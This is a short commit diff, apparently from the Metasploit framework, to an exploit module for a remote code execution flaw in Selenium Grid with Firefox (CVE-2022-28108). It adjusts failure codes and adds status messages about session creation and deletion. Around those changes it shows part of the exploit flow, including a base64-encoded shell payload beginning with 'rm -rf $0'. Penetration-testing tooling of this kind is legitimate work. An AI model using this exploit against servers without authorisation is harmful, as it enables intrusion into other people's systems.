Update failure and print about session id

Author: Takahiro-Yoko

modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb

@@ -138,10 +138,12 @@ def exploit
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unreachable, 'Connection failed.') unless res
+    fail_with(Failure::Unknown, 'Connection failed.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
-    fail_with(Failure::Unreachable, 'Failed to start session.') unless session_id
+    fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
+
+    print_status("Started session (#{session_id}).")
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\
@@ -161,12 +163,18 @@ def exploit
     })
     # The server does not send a response, so no check here
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
     })
-    # The server does not send a response, so no check here
+    if res
+      print_status("Deleted session (#{session_id}).")
+    else
+      print_status("Failed to delete the session (#{session_id}). "\
+                   'You may need to wait for the session to expire (default: 5 minutes) or '\
+                   'manually delete the session for the next exploit to succeed.')
+    end
   end
 
 end